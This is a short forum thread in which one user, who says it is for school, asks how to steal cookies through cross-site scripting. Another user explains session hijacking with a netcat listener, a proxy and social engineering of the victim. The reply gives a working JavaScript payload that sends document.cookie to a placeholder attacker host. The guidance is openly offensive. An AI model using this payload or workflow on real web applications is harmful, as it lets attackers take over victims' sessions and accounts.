.

XSS snatching cookie without domain

<<

bigapple

Newbie
Newbie

Posts: 8

Joined: Thu Aug 18, 2011 12:07 pm

Post Thu Aug 18, 2011 1:39 pm

XSS snatching cookie without domain

Okay I'm new to this site so I'm hoping me question doesn't come off as malicious. This is for school, so I'm not trying to do anything evil. Anyways, I was wondering if its possible to snatch a cookie using XSS, and deliver it to an attacker without sending it to an attacker controlled domain. Like if an attacker didn't own a domain, or if the domain was blocked, is there any other method or trick that can be used to recieve the cookie? I can code in Javascript relatively well, so you can talk about Javascript functions, methods etc. And thats encouraged because I'm interested in the coding perspective so please give me your ideas. Thanks.  ;D
<<

cd1zz

User avatar

Recruiters
Recruiters

Posts: 566

Joined: Sun Oct 03, 2010 9:01 pm

Post Thu Aug 18, 2011 2:45 pm

Re: XSS snatching cookie without domain

3 assumptions: 1) the site uses session cookies and 2) there is an xss vulnerability in the application and 3) you can SE someone to open your link or get it to them somehow.

With that said, yes. You can basically take the cookie from the site using javascript and send it to a listener somewhere else. A simple remote netcat listener would do to capture your stolen cookie. With the data posted to your screen you'd just locate the cookie and copy it. Then, use a proxy to intercept your own web communications to inject your stolen cookie and what ever else you need. Does that answer your question?
<<

bigapple

Newbie
Newbie

Posts: 8

Joined: Thu Aug 18, 2011 12:07 pm

Post Thu Aug 18, 2011 4:31 pm

Re: XSS snatching cookie without domain

I thought Javascript code was limited to client-side browser stuff. Can Javascript even make a TCP connection? If it can, then yes that would answer my question very nicely. But I was thinking more along the lines of something like emailing the contents of the cookie, or some other web-related method of delivering it but that will work well. Thanks.
<<

cd1zz

User avatar

Recruiters
Recruiters

Posts: 566

Joined: Sun Oct 03, 2010 9:01 pm

Post Thu Aug 18, 2011 4:45 pm

Re: XSS snatching cookie without domain

You could use something like document.location.replace("http://yourbox/"+document.cookie+"pagelocation:"+document.location)

which would connect to "yourbox" where your netcat listener is and send you the cookie with the url query string.....

MaXe has a nice example here, not the same thing but it might get your wheels turning:  http://www.exploit-db.com/vbseo-from-xs ... php-shell/
<<

bigapple

Newbie
Newbie

Posts: 8

Joined: Thu Aug 18, 2011 12:07 pm

Post Fri Aug 19, 2011 6:33 am

Re: XSS snatching cookie without domain

Okay, thanks. That answers my question nicely  ;D

Return to Web Applications

Who is online

Users browsing this forum: No registered users and 0 guests

.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software